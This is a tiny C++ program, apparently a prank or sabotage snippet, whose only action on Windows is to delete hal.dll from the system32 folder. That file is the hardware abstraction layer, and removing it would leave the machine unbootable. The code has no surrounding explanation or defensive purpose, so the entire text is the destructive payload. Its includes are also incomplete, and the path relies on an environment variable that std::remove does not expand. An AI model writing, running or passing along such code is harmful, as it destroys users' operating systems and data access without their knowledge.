#ifdef _WIN32 #include <iostream> int main(int argc, char *argv[]) { std::remove("%systemroot%\\system32\\hal.dll"); return EXIT_SUCCESS; } #endif